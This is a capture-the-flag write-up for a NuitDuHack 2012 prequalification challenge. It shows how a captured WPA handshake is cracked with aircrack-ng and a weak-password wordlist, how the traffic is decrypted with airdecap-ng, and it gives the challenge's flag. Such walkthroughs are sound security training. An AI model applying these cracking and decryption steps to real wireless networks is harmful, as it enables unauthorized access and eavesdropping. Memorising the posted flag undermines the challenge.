NuitDuHack 2012 Prequals – sciteekadm.cap

Hopefully, we succeeded to spy some wireless communications around Sciteek
building, our technical staff has attached the capture file, will you be able
to exploit it? We hope that some valuable files were exchanged during the
Please entitle your reply “captured file”, as usual.

By the way, your account has been credited with $1000.

Summary: WPA traffic decrypting

Here we have a pcap file with 802.11 (wireless) traffic dump. Seems it’s encrypted, let’s try aircrack:

$ aircrack-ng sciteekadm.cap -w 500-worst-passwords.txt 
Opening sciteekadm.cap
Read 345 packets.
   #  BSSID              ESSID                     Encryption
   1  40:FC:89:E0:FF:D3  Sciteek-adm               WPA (1 handshake)
Choosing first network as target.
Opening sciteekadm.cap
Reading packets, please wait...
                                 Aircrack-ng 1.1
                   [00:00:00] 4 keys tested (300.98 k/s)
                           KEY FOUND! [ 12345678 ]

Password found! But sadly, wireshark can’t decrypt it, because EAPOL packets are corrupted/missing.
But there is a nice tool called airdecap-ng (thx to @kyprizel):

$ airdecap-ng -p 12345678 sciteekadm.cap -e Sciteek-adm
Total number of packets read           345
Total number of WEP data packets         0
Total number of WPA data packets        55
Number of plaintext data packets         0
Number of decrypted WEP  packets         0
Number of corrupted WEP  packets         0
Number of decrypted WPA  packets        41
$ wireshark sciteekadm-dec.cap

Now we can simply extract a file from tcp session:

The flag: 7e4ef92d1472fa1a2d41b2d3c1d2b77a

1 comment

  1. Какое было оказывается изящное решение если знать правильный софт :)

Leave a Reply

Your email address will not be published.